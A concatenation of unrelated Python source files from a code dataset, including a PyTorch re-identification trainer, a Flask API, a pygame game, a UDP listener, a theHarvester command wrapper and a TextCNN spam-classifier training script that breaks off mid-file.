8/1/19 10:03 PM\n# Description: finetune the tiger_cnn3 with triplet\n# -------------------------------------------------------------------------------\n\nimport torch.optim as optim\nfrom shutil import copyfile\nfrom datetime import datetime\nfrom tqdm import tqdm\nfrom core import *\nfrom dataload import *\n\ninit_environment()\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\nmulti_gpus = False\nmodel_name = 'tiger_cnn8'\n\n\ndef main():\n save_dir = os.path.join(SAVE_DIR, model_name + '_' +\n datetime.now().strftime('%Y%m%d_%H%M%S'))\n if os.path.exists(save_dir):\n raise NameError('model dir exists!')\n os.makedirs(save_dir)\n copyfile('./finetune_tiger_cnn8.py', save_dir + '/train.py')\n copyfile('./core/model.py', save_dir + '/model.py')\n copyfile('./core/config.py', save_dir + '/config.py')\n logging = init_log(save_dir)\n _print = logging.info\n\n train_paths = ['./datalist/train.txt', ]\n gallery_paths = ['./datalist/gallery.txt', ]\n probe_paths = ['./datalist/probe.txt', ]\n\n train_iter, gallery_iter, probe_iter = load_triplet_direction_gallery_probe(\n root='./database',\n train_paths=train_paths,\n gallery_paths=gallery_paths,\n probe_paths=probe_paths,\n signal=' ',\n resize_size=RESIZE_SIZE,\n input_size=INPUT_SIZE,\n batch_size=4,\n num_workers=2,\n collate_fn=train_collate\n )\n\n feature_size = 1024\n\n net = tiger_cnn8(classes=107)\n ignore_params = list(map(id, net.fc7.parameters()))\n ignore_params += list(map(id, net.cls.parameters()))\n ignore_params += list(map(id, net.cls_direction.parameters()))\n ignore_params += list(map(id, net.erase_fc7.parameters()))\n ignore_params += list(map(id, net.erase_cls.parameters()))\n ignore_params += list(map(id, net.erase_cls_direction.parameters()))\n ignore_params += list(map(id, net.fuse_fc7.parameters()))\n ignore_params += list(map(id, net.fuse_cls.parameters()))\n ignore_params += list(map(id, net.fuse_cls_direction.parameters()))\n base_params = filter(lambda p: id(p) not in ignore_params, net.parameters())\n extra_params = filter(lambda p: id(p) in ignore_params, net.parameters())\n optimizer = optim.SGD(\n [{'params': base_params, 'lr': 0.001},\n {'params': extra_params, 'lr': 0.001}],\n weight_decay=1e-4, momentum=0.9, nesterov=True\n )\n exp_lr_scheduler = StepLRScheduler(optimizer=optimizer, decay_t=20, decay_rate=0.1, warmup_lr_init=1e-5, warmup_t=3)\n\n net.load_state_dict(torch.load('./model/tiger_cnn3/model.ckpt')['net_state_dict'])\n # net.fix_params(is_training=False)\n net = net.cuda()\n if multi_gpus:\n net = nn.DataParallel(net)\n\n losses = AverageMeter()\n train_acc = AverageMeter()\n train_acc5 = AverageMeter()\n\n erase_train_acc = AverageMeter()\n\n max_test_acc = 0.0\n for epoch in range(TOTAL_EPOCH):\n\n # train\n net.train()\n flag = False\n exp_lr_scheduler.step(epoch)\n losses.reset()\n train_acc.reset()\n train_acc5.reset()\n erase_train_acc.reset()\n\n for data in tqdm(train_iter, desc='Train Epoch: {}'.format(epoch + 1)):\n inputs, labels, direction = data\n\n if random.uniform(0, 1) > 0.5:\n inputs = fliplr(inputs)\n direction = 1 - direction\n\n if inputs.size(0) == 1:\n continue\n inputs = inputs.cuda()\n labels = labels.long().cuda()\n direction = direction.long().cuda()\n b_size = labels.size(0)\n\n optimizer.zero_grad()\n\n logits = net(inputs, labels)\n if multi_gpus:\n loss = net.module.get_loss(logits, labels, direction)\n else:\n loss = net.get_loss(logits, labels, direction)\n\n if loss == 0:\n continue\n\n acc = accuracy(logits[0].data, labels, topk=(1, 5))\n losses.update(loss.item(), b_size)\n train_acc.update(acc[0], b_size)\n train_acc5.update(acc[1], b_size)\n\n loss.backward()\n optimizer.step()\n _print('Train Epoch: {}\\t'\n 'Loss: {loss.avg:.4f}\\t'\n 'TrainAcc: Prec@1 {train_acc.avg:.3f}%\\tPrec@2 {erase_train_acc.avg:.3f}%'.format(\n epoch + 1, loss=losses, train_acc=train_acc, erase_train_acc=train_acc5\n ))\n\n # val\n if (epoch + 1) % TEST_FREQ == 0:\n net.eval()\n gallery_features = []\n gallery_labels = []\n query_features = []\n query_labels = []\n for data in tqdm(gallery_iter, desc='Train Epoch: {}'.format(epoch + 1)):\n with torch.no_grad():\n inputs, labels = data\n if inputs.size(0) == 1:\n continue\n labels = labels.long().cuda()\n b_size = labels.size(0)\n\n ff = torch.FloatTensor(b_size, feature_size).zero_().cuda()\n for i in range(1):\n flip_inputs = fliplr(inputs).detach()\n flip_inputs = Variable(flip_inputs.cuda())\n\n input_img = Variable(inputs.cuda())\n if multi_gpus:\n features = net.module.features(input_img)[0]\n flip_features = net.module.features(flip_inputs)[0]\n else:\n features = net.features(input_img)[0]\n flip_features = net.features(flip_inputs)[0]\n\n ff += torch.cat((features, flip_features), dim=1)\n\n fnorm = torch.norm(ff, p=2, dim=1, keepdim=True)\n ff = ff.div(fnorm.expand_as(ff))\n\n for i in range(b_size):\n gallery_features.append(ff[i].cpu().numpy())\n gallery_labels.append(labels[i].cpu().numpy())\n\n for data in tqdm(probe_iter, desc='Train Epoch: {}'.format(epoch + 1)):\n with torch.no_grad():\n inputs, labels = data\n if inputs.size(0) == 1:\n continue\n labels = labels.long().cuda()\n b_size = labels.size(0)\n\n ff = torch.FloatTensor(b_size, feature_size).zero_().cuda()\n for i in range(1):\n flip_inputs = fliplr(inputs).detach()\n flip_inputs = Variable(flip_inputs.cuda())\n\n input_img = Variable(inputs.cuda())\n if multi_gpus:\n features = net.module.features(input_img)[0]\n flip_features = net.module.features(flip_inputs)[0]\n else:\n features = net.features(input_img)[0]\n flip_features = net.features(flip_inputs)[0]\n\n ff += torch.cat((features, flip_features), dim=1)\n\n fnorm = torch.norm(ff, p=2, dim=1, keepdim=True)\n ff = ff.div(fnorm.expand_as(ff))\n\n for i in range(b_size):\n query_features.append(ff[i].cpu().numpy())\n query_labels.append(labels[i].cpu().numpy())\n gallery_features = torch.FloatTensor(gallery_features)\n gallery_labels = np.array(gallery_labels)\n query_features = torch.FloatTensor(query_features)\n query_labels = np.array(query_labels)\n\n CMC, ap = evaluate_rerank_CMC(query_features, query_labels, gallery_features, gallery_labels)\n _print('Rank@1:%f Rank@5:%f Rank@10:%f mAP:%f' % (CMC[0], CMC[4], CMC[9], ap / len(query_labels)))\n if max_test_acc <= CMC[0]:\n max_test_acc = CMC[0]\n flag = True\n # save\n if flag:\n msg = 'Saving checkpoint: {}'.format(epoch + 1)\n _print(msg)\n if multi_gpus:\n net_state_dict = net.module.state_dict()\n else:\n net_state_dict = net.state_dict()\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n torch.save(\n {'epoch': epoch,\n 'net_state_dict': net_state_dict},\n os.path.join(save_dir, 'model.ckpt')\n )\n _print('-------max_test_acc Rank@1 {max_test_acc:.3f}-------'.format(\n max_test_acc=max_test_acc\n ))\n\n _print('finish')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"finetune_tiger_cnn8.py","file_name":"finetune_tiger_cnn8.py","file_ext":"py","file_size_in_byte":8868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"223348520","text":"from sklearn.preprocessing import OneHotEncoder\nimport pandas as pd\n\ndef onehot(dataframes, col, **kwargs):\n \"\"\"Applies onehot transformation to the col\n It trains the classifier using the first dataframe\n \n Args:\n dataframes (List[DataFrame[float]]): list of pandas dataframes\n cols (str): The col that should be transformed\n \"\"\"\n\n onehot_clf = OneHotEncoder(sparse=False)\n onehot_clf.fit(dataframes[0][col].values.reshape(-1,1))\n\n\n for i in range(len(dataframes)):\n col_onehot = onehot_clf.transform(\n dataframes[i][col].values.reshape(-1,1))\n \n n_onehot_cols = col_onehot.shape[1]\n onehot_col_names = [\"{}_{}\".format(col, i) for i in range(n_onehot_cols)]\n\n transformed_df = pd.DataFrame(col_onehot, columns=onehot_col_names)\n \n for onehot_col in onehot_col_names:\n kwargs = {onehot_col:transformed_df[onehot_col].values}\n dataframes[i] = dataframes[i].assign(**kwargs)\n \n dataframes[i] = dataframes[i].drop([col], axis=1)\n \n return dataframes\n\n\n","sub_path":"src/pipelines/filters/onehot.py","file_name":"onehot.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"431919055","text":"# Copyright 2014 Cloudbase Solutions Srl\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nUtility class for VHD related operations.\nBased on the \"root/virtualization/v2\" namespace available starting with\nHyper-V Server / Windows Server 2012.\n\"\"\"\nimport os\n\nif os.name == 'nt':\n import wmi\n\nfrom cinder.openstack.common import log as logging\nfrom cinder.volume.drivers.windows import constants\nfrom cinder.volume.drivers.windows import vhdutils\nfrom cinder.volume.drivers.windows import windows_utils\n\nLOG = logging.getLogger(__name__)\n\n\nclass VHDUtilsV2(vhdutils.VHDUtils):\n\n _vhd_format_map = {\n 'vhd': 2,\n 'vhdx': 3,\n }\n\n def __init__(self):\n self.utils = windows_utils.WindowsUtils()\n self._conn = wmi.WMI(moniker='//./root/virtualization/v2')\n\n def _get_resize_method(self):\n image_man_svc = self._conn.Msvm_ImageManagementService()[0]\n return image_man_svc.ResizeVirtualHardDisk\n\n def convert_vhd(self, src, dest, vhd_type=constants.VHD_TYPE_DYNAMIC):\n vhd_info = self._conn.Msvm_VirtualHardDiskSettingData.new()\n ext = os.path.splitext(dest)[1][1:]\n format = self._vhd_format_map.get(ext)\n\n vhd_info.Type = vhd_type\n vhd_info.Path = dest\n vhd_info.Format = format\n vhd_info.BlockSize = 0\n vhd_info.LogicalSectorSize = 0\n vhd_info.ParentPath = None\n\n image_man_svc = self._conn.Msvm_ImageManagementService()[0]\n (job_path, ret_val) = image_man_svc.ConvertVirtualHardDisk(\n SourcePath=src, VirtualDiskSettingData=vhd_info.GetText_(1))\n self.utils.check_ret_val(ret_val, job_path)\n","sub_path":"cinder/virtualenv/lib/python2.6/site-packages/cinder/volume/drivers/windows/vhdutilsv2.py","file_name":"vhdutilsv2.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"598627203","text":"\"\"\"\n~~~~~~~~~~~~~~~~~\nweb.products.api.py\n\nPark all products apis here\n~~~~~~~~~~~~~~~~~\n\"\"\"\n\nimport logging\n\n\nfrom flask import jsonify, request, Response\nfrom dao.product_service import ProductService\nfrom web.products.utils import parse_products_response\nfrom web.common.exceptions import BadRequest\nfrom web.products import products\n\nlogger = logging.getLogger(\"products.api\")\n\nproduct_service = ProductService()\n\n\n@products.route(\"/products/categories\", methods=[\"GET\"])\ndef get_categories():\n \"\"\"Get categories\"\"\"\n categories = product_service.list_categories()\n if not categories:\n return Response(status=204)\n\n return jsonify({\"categories\": categories}), 200\n\n\n@products.route(\"/products\", methods=[\"GET\"])\ndef search_products():\n \"\"\"Search products\"\"\"\n\n category = request.args.get(\"category\")\n if not category:\n raise BadRequest(\"Product category is required in args\")\n text = request.args.get(\"text\")\n if not text:\n raise BadRequest(\"Product text is required in args\")\n\n page_num = int(request.args.get(\"page\", \"1\"))\n response = parse_products_response(\n category=category, text=text, page_num=page_num, product_service=product_service\n )\n if not response:\n raise Response(status=204)\n\n return jsonify(response), 200\n","sub_path":"web/products/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"379939493","text":"from mrjob.job import MRJob\nfrom mrjob.protocol import JSONProtocol, RawValueProtocol\nimport datetime\nimport logging\n\n\ndef safeFloat(stuff):\n try:\n f = float(stuff)\n except ValueError:\n pass\n else:\n if f != 0:\n return f\n\n\ndef sanitize(stuff):\n if stuff.lower() != 'nan':\n return stuff\n\n\nclass MRbuildRoutes(MRJob):\n INPUT_PROTOCOL = RawValueProtocol\n OUTPUT_PROTOCOL = JSONProtocol\n\n def mapper(self, _, line):\n if not line.startswith('idO'):\n record = line.split(',')\n tupledict = {'idOwnApp':record[0],\n 'idMsg':record[1],\n 'idVeh':record[2],\n 'idProviderComm':record[3],\n 'tmMsg':record[4],\n 'amLat':safeFloat(record[5]),\n 'amLong':safeFloat(record[6]),\n 'amSpeedCurr':safeFloat(record[7]),\n 'idSts':bool(record[8]),\n 'idTrigger':record[9],\n 'amDistTot':safeFloat(record[10]),\n 'amEngMinsTot':safeFloat(record[11]),\n 'tmUpdate':record[12],\n 'idMsgBlobParent':record[13],\n 'idMsgVp':sanitize(record[14]),\n 'place_name':record[15],\n 'postal_code':record[16],\n 'country_code':record[17]\n }\n\n yield tupledict['idVeh'], tupledict\n\n def reducer(self, idVeh, data):\n points = sorted(data, key=lambda record: record['tmMsg'])\n yield idVeh, points\n\n\nif __name__ == '__main__':\n MRbuildRoutes.run()\n","sub_path":"TRUCK_wisdom/codes/routes/roadmrjob1.py","file_name":"roadmrjob1.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"385921664","text":"import re\nimport itertools\nimport warnings\n\ndef link_in_response_header(response):\n \"\"\"\n A server implementing content negotiation by profile SHOULD return an HTTP Link header\n containing information about the default and any alternate representations of that\n resource including profiles they conform to.\n \"\"\"\n assert 'link' in response.headers\n\n \"\"\"\n The default representation – the one that will be returned when no specific representation\n is requested – SHOULD be identified by rel=\"canonical\", other representations by rel=\"alternate\"\n \"\"\"\n links = response.headers['link'].split(',')\n supported_profiles = [p.strip() for p in links if 'profile=' in p ]\n\n assert len([p for p in supported_profiles if 'rel=\"canonical\"' in p]) == 1, \\\n 'R.1.1.b: Profile with rel=\"canonical\" was not found'\n \n assert all(['rel=\"alternate\"' in p for p in supported_profiles if 'rel=\"canonical\"' not in p]), \\\n 'R.1.1.b: All alternative profiles were not identified with rel=\"alternate\"'\n\ndef link_indicates_profile_returned(response, requested_profile):\n \"\"\"\n A server implementing content negotiation by profile MUST respond with an\n HTTP Response header containing a Link header with rel=\"profile\" indicating the profile returned.\n \"\"\"\n links = response.headers['link'].split(',')\n\n profile_link_header = [p for p in links if 'rel=\"profile\"' in p ]\n assert len(profile_link_header) == 1\n assert f\"<{requested_profile}>\" in profile_link_header[0]\n\ndef check_existance_of_alternatives(response, profiles, mediatypes):\n \"\"\"\n R.2.3.c\n The server SHOULD represent the alternate profiles information in the HTTP header\n of the response, as per the HTTP Headers functional profile (using a Link header)\n \"\"\"\n assert 'link' in response.headers\n\n links = response.headers['link'].split(',')\n supported_profiles = [p.strip() for p in links if 'profile=' in p ]\n\n '''\n R.2.3.c\n The server SHOULD represent the alternate profiles information in the HTTP header\n of the response, as per the HTTP Headers functional profile (using a Link header)\n '''\n assert all(['rel=\"alternate\"' in p for p in supported_profiles if 'rel=\"self\"' not in p])\n urls = [re.search('<(http.*)>', profile).group(1) for profile in supported_profiles]\n\n # Check that profile/mediatype combinations that are passed to the function\n # i.e: which should exist, are present in the Link Header\n qsa_urls_should_be_present = []\n for p, e in itertools.product(profiles, mediatypes):\n alternative_found = False\n for full_link in supported_profiles:\n if f'profile=\"{p}\"' in full_link and f'type=\"{e}\"' in full_link:\n qsa_urls_should_be_present.append(re.search(\"<(http.*)>\", full_link).group(1))\n alternative_found = True\n break\n\n assert alternative_found, \\\n f'Could not find an alternate with profile=\"{p}\" and type=\"{e}\"'\n\n assert len(set(qsa_urls_should_be_present) - set(urls)) == 0\n\n '''\n R.2.3.d\n [the server] MAY also represent the information in the response body\n in place of the default profile representation of a resource\n \n R.2.3.e\n Where a server does provide alternate profiles information in an HTTP body,\n the server MAY allow clients to negotiate for particular Media Types of the\n response by using the same Media Type negotiation method used for the get resource\n by profile function\n '''\n qsa_urls_in_body = set(\n re.findall(r\"href=\\\"(\\S+_profile=\\w+&_mediatype=.*?)\\\"\", str(response.content))\n )\n\n if qsa_urls_in_body:\n assert len(urls) == len(qsa_urls_in_body)\n\n if any([url for url in urls if url not in qsa_urls_in_body]):\n warnings.warn(\"Alternative profile URLs found in default page do not match Link Header!\")\n \n\n # Since assumptions cannot be made on how the data will be presented (table, CSS grid etc.)\n # unable to verify the required information is present, apart from the URLs\n '''\n R.2.4.a - UNTESTED\n Implementations of this specification according to the QSA Functional Profiles\n MUST communicate their alternate representations information as per the\n Alternate Representations Data Model\n \n R.2.4.b - UNTESTED\n They MAY do so using HTTP Link headers, as per the HTTP Headers functional profile,\n or they MAY use other approaches.\n \n R.2.4.c - UNTESTED\n They may do so via HTTP body content, perhaps in HTML or other data models/formats\n '''\n\n","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"138956630","text":"\"\"\"\nThe following snippet shows how you can write a simple calculator without the need to use if-else conditions.\n\"\"\"\n\nimport operator\n\naction = {\n \"+\": operator.add,\n \"-\": operator.sub,\n \"/\": operator.truediv,\n \"*\": operator.mul,\n \"**\": pow\n}\nprint(action['-'](50, 25)) # 25\n","sub_path":"Calculator Without If-Else.py","file_name":"Calculator Without If-Else.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"404573719","text":"## Game class\nimport CONSTANTS\nimport pygame\nimport random\nimport block_library\nimport good_block_library\nimport bad_block_library\nimport score_library\nimport player_library\n\nclass Game(object):\n ''' This class represents an instance of the game\n To restart/reset the game we just need to create\n a new instance of the class '''\n\n def __init__(self):\n ''' constructor '''\n self.game_over = False\n\n # create sprite lists\n self.good_block_list = pygame.sprite.Group()\n self.bad_block_list = pygame.sprite.Group()\n self.all_sprites_list = pygame.sprite.Group()\n\n # set sprite varianles\n self.good_block_sprite = CONSTANTS.GOOD_BLOCK_GRAPHIC\n self.bad_block_sprite = CONSTANTS.BAD_BLOCK_GRAPHIC\n\n # create good blocks\n for i in range(random.randrange(30, 80)):\n block = good_block_library.Good_Block( self.good_block_sprite )\n\n # Set random location for block\n block.rect.x = random.randrange(CONSTANTS.SCREEN_WIDTH)\n block.rect.y = random.randrange(CONSTANTS.SCREEN_HEIGHT)\n\n # add block to the appropriate lists\n self.good_block_list.add(block)\n self.all_sprites_list.add(block)\n\n # create bad blocks\n for i in range(random.randrange(60, 100)):\n block = bad_block_library.Bad_Block ( self.bad_block_sprite )\n\n # set random locations for the blocks\n block.rect.x = random.randrange(CONSTANTS.SCREEN_WIDTH)\n block.rect.y = random.randrange(CONSTANTS.SCREEN_HEIGHT)\n\n # add block to the appropriate lists\n self.bad_block_list.add(block)\n self.all_sprites_list.add(block)\n\n\n # create the player\n self.player = player_library.Player(20, 15, CONSTANTS.PLAYER_BOUNCE_SOUND)\n self.player.makesoundmixer()\n self.all_sprites_list.add(self.player)\n\n # create the score attribute:\n # set score attributes\n self.score = score_library.Score()\n self.score.text = 0\n self.score.font = 'Calibri'\n self.score.size = 30\n self.score.bold = True\n self.score.italics = True\n\n\n\n def process_events(self): # process user input, return a true if game is over\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return True\n if event.type == pygame.MOUSEBUTTONDOWN:\n if self.game_over:\n self.__init__()\n\n\n # Set the speed based on the key pressed\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n self.player.changespeed(-3, 0)\n elif event.key == pygame.K_RIGHT:\n self.player.changespeed(3, 0)\n elif event.key == pygame.K_UP:\n self.player.changespeed(0, -3)\n elif event.key == pygame.K_DOWN:\n self.player.changespeed(0, 3)\n \n # Reset speed when key goes up\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n self.player.changespeed(3, 0)\n elif event.key == pygame.K_RIGHT:\n self.player.changespeed(-3, 0)\n elif event.key == pygame.K_UP:\n self.player.changespeed(0, 3)\n elif event.key == pygame.K_DOWN:\n self.player.changespeed(0, -3)\n\n\n def run_logic(self): # this method is run for each frame\n if not self.game_over:\n\n self.all_sprites_list.update()\n self.score.create_text()\n\n # check for collisions\n self.good_blocks_hit_list = pygame.sprite.spritecollide(self.player, self.good_block_list, True)\n self.bad_blocks_hit_list = pygame.sprite.spritecollide(self.player, self.bad_block_list, True)\n\n # process collisions\n for block in self.good_blocks_hit_list:\n self.score.text += 1\n CONSTANTS.GOOD_BLOCK_SOUND.play()\n\n for block in self.bad_blocks_hit_list:\n self.player.lifes -= 1\n CONSTANTS.BAD_BLOCK_SOUND.play()\n\n\n # check to see if the game is over\n if len(self.good_block_list) == 0 or self.player.lifes <= 0:\n self.game_over = True\n\n\n def display_frame(self, screen): # Display stuff to the screen\n screen.fill(CONSTANTS.WHITE)\n\n if self.game_over:\n font = pygame.font.SysFont(\"serif\", 25)\n text = font.render(\"Game Over! Click to restart.\", True, CONSTANTS.BLACK)\n centre_x = (CONSTANTS.SCREEN_WIDTH // 2) - (text.get_width() // 2)\n centre_y = (CONSTANTS.SCREEN_HEIGHT // 2) - (text.get_height() // 2)\n screen.blit(text, [centre_x, centre_y])\n\n score_text1 = font.render(str(self.score.text), True, CONSTANTS.BLACK)\n score_text = font.render(\"Your score was: \", True, CONSTANTS.BLACK)\n score_centre_y = centre_y + (score_text.get_height())\n screen.blit(score_text, [centre_x, score_centre_y])\n screen.blit(score_text1, [(centre_x + score_text.get_width() + 5), score_centre_y])\n\n \n if not self.game_over:\n self.score.draw_text(screen, CONSTANTS.SCREEN_WIDTH - self.score.size , 10)\n self.all_sprites_list.draw(screen)\n self.player.draw_lives(screen)\n\n pygame.display.flip()\n \n \n \n \n \ndef main():\n ''' Main program function'''\n pygame.init()\n size = [CONSTANTS.SCREEN_WIDTH, CONSTANTS.SCREEN_HEIGHT]\n screen = pygame.display.set_mode(size)\n\n pygame.display.set_caption(\"Blue Block Redemption\")\n pygame.mouse.set_visible(False)\n\n # create objects and set data for the function\n done = False\n clock = pygame.time.Clock()\n\n # create an instance of the game class\n game = Game()\n\n # main game loop\n while not done:\n # process events\n done = game.process_events()\n\n # update object positions, check for collisions\n game.run_logic()\n\n # draw the current frame\n game.display_frame(screen)\n\n # Pause for next frame\n clock.tick(60)\n\n # close window and exit\n pygame.quit()\n\n\n# Call main function, start up game\n\nif __name__ == \"__main__\":\n main()\n \n\n\n\n","sub_path":"Collect_Blocks/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"573039014","text":"#!/bin/python\r\n\r\nPORT = 50001\r\nMAGIC = \"fna349fn\" #to make sure we don't confuse or get confused by other programs\r\n\r\nfrom socket import socket, AF_INET, SOCK_DGRAM\r\nimport os\r\n\r\ntry:\r\n \r\n s = socket(AF_INET, SOCK_DGRAM) #create UDP socket\r\n s.bind(('', PORT))\r\n\r\n while 1:\r\n data, addr = s.recvfrom(1024) #wait for a packet\r\n if data.startswith(bytes(MAGIC, 'UTF-8')):\r\n print(addr)\r\n state = data[len(MAGIC):].decode('UTF-8')\r\n print(\"got service announcement from %s: %s\" % (addr[0], state))\r\n os.system(\"python send.py %s\" % state)\r\n \r\n else:\r\n \tprint(\"HIDDEN::: %s\" % data.decode('UTF-8'))\r\n \t\r\nexcept KeyboardInterrupt:\r\n os.system(\"python send.py QUIT\")\r\n print(\"cancel.\")\r\n","sub_path":"listenToClients.py","file_name":"listenToClients.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"585791756","text":"#!/usr/bin/env python3\n\nclass theHarvester:\n def __init__(self, args):\n self.url = args.url\n self.power = args.power\n self.command = \"\"\n\n def Info(self):\n self.command = \"theharvester -h\"\n\n def Run(self):\n if self.url[:7] == \"http://\":\n self.url = self.url.replace(\"http://\", \"\")\n elif self.url[:8] == \"https://\":\n self.url = self.url.rstrip('https://')\n if self.url[-1] == \"/\":\n self.url = self.url.rstrip('/')\n \n if self.power == 1:\n self.power = \"-l 500 -b google,bing\"\n elif self.power == 2:\n self.power = \"-l 800 -b google,bing,duckduckgo,yahoo --shodan\"\n elif self.power == 3:\n self.power = \"-l 1000 -b google,bing,duckduckgo,yahoo,dnsdumpster,rapiddns --shodan -v -r -n -c\"\n else:\n print(f\"\\n{C.YELLOW}[!]{C.RC} The selected power level is not beyond the script. Level 1 has been selected by default.{C.RC}\")\n self.power = \"-l 500 -b google,bing\"\n\n self.command = \"theharvester -d \" + self.url + self.power\n return self.command","sub_path":"src/tools/theharvester.py","file_name":"theharvester.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"360116239","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n# ____ ____ ______________\n# | | | | | |\n# | | | | |_____ _____|\n# | |__| | | |\n# | __ | | |\n# | | | | | |\n# | | | | | |\n# |____| |____| |____|\n#\n# fileName:train \n# project: TextCNN_SpamSort\n# author: theo_hui\n# e-mail:Theo_hui@163.com\n# purpose: 对模型进行训练\n# creatData:2019/5/8\n\n#! /usr/bin/env python\n# encoding: utf-8\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport time\nimport datetime\nimport data_process_tool\nimport word2vec_tool\nfrom TextCNN import TextCNN\n\n\n\n# 训练数据的一些参数\ntf.flags.DEFINE_float(\"validation_percentage\",0.1,\"所有的训练数据用来验证的比例\")\ntf.flags.DEFINE_string(\"positive_data_file\", \"./data/ham_100.utf8\", \"正样本数据\")\ntf.flags.DEFINE_string(\"negative_data_file\", \"./data/spam_100.utf8\", \"负样本数据\")\ntf.flags.DEFINE_integer(\"num_labels\",2,\"要分类的数目 二分类\")\n\n# 模型的一些参数\ntf.flags.DEFINE_integer(\"embedding_dim\", 128, \"隐藏层的维度\")\ntf.flags.DEFINE_string(\"filter_sizes\", \"3,4,5\", \"每个过滤器的尺寸\")\ntf.flags.DEFINE_integer(\"num_filters\", 128, \"每个过滤器尺寸的过滤器数量\")\ntf.flags.DEFINE_float(\"dropout_keep_prob\", 0.5, \"Dropout 比例\")\ntf.flags.DEFINE_float(\"l2_reg_lambda\", 0.0, \"L2 正则化比例\")\n\n# 训练的一些参数\ntf.flags.DEFINE_integer(\"batch_size\", 64, \"Batch大小\")\ntf.flags.DEFINE_integer(\"num_steps\", 200, \"训练的次数\")\ntf.flags.DEFINE_integer(\"evaluate_every\", 100, \"评价的间隔步数\")\ntf.flags.DEFINE_integer(\"checkpoint_every\", 100, \"保存模型的间隔步数\")\ntf.flags.DEFINE_integer(\"num_checkpoints\", 5, \"保存的checkpoints数\")\n\n# Misc parameters\ntf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\ntf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\n\n# 解析参数\nFLAGS = tf.flags.FLAGS\nFLAGS.flag_values_dict()\nprint(\"\\n*SETED FLAGS AS FOLLOW*\\nFLAG_NAME\\tFLAG_VALUE\\n===========================================================\")\nfor attr, value in sorted(FLAGS.__flags.items()):\n print(\"{}\\t{}\".format(attr.upper(), value))\nprint(\"==========================================================================\")\n\n# 输出数据和模型的目录\n# =======================================================\ntimestamp = str(int(time.time()))\nout_dir = os.path.abspath(os.path.join(os.path.curdir, \"runs\",timestamp))\nwVec_dir = os.path.abspath(os.path.join(os.path.curdir,\"wordVec\"))\nprint(\"\\nwordModle save tp {}\\nWriting to {}\\n\".format(wVec_dir,out_dir))\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\nif not os.path.exists(wVec_dir):\n os.makedirs(wVec_dir)\n# 数据处理\n# =======================================================\n\n# 加载数据\nprint(\"\\nLoading data...\")\nx_text, y = data_process_tool.load_positive_negative_data_files(FLAGS.positive_data_file, FLAGS.negative_data_file)\nprint(x_text)\nprint(\"\\nloaded!\")\n\n# 获得隐藏层向量\nprint(\"\\n Loading embedding Layer tensor(padding)....\")\nsentences, max_document_length = data_process_tool.padding_sentences(x_text, '')\nprint(\"padding done!\")\nx = np.array(word2vec_tool.embedding_sentences(sentences, embedding_size = FLAGS.embedding_dim, file_to_save = os.path.join(wVec_dir, 'trained_word2vec.model')))\nprint(\"x.shape = {}\".format(x.shape))\nprint(\"y.shape = {}\".format(y.shape))\n\n\n\n#保存训练的参数\ntraining_params_file = os.path.join(out_dir, 'training_params.pickle')\nparams = {'num_labels' : FLAGS.num_labels, 'max_document_length' : max_document_length}\ndata_process_tool.saveDict(params, training_params_file)\n\n#\n# 随机打乱数据\nnp.random.seed(10)\nshuffle_indices = np.random.permutation(np.arange(len(y)))\nx_shuffled = x[shuffle_indices]\ny_shuffled = y[shuffle_indices]\n\n\n# 分隔验证和训练数据集\n# TODO: This is very crude, should use cross-validation\ndev_sample_index = -1 * int(FLAGS.validation_percentage * float(len(y)))\nx_train, x_dev = x_shuffled[:dev_sample_index], x_shuffled[dev_sample_index:]\ny_train, y_dev = y_shuffled[:dev_sample_index], y_shuffled[dev_sample_index:]\nprint(\"Train/Dev split: {:d}/{:d}\".format(len(y_train), len(y_dev)))\n\n# 训练\n# =======================================================\n\nwith tf.Graph().as_default():\n\n #参数配置\n session_conf = tf.ConfigProto(\n allow_soft_placement = FLAGS.allow_soft_placement,#如果指定的设备不存在 是否允许tf自动分配\n\tlog_device_placement = FLAGS.log_device_placement) #是否打印设备分配日志\n\n #创建会话\n sess = tf.Session(config = session_conf)\n with 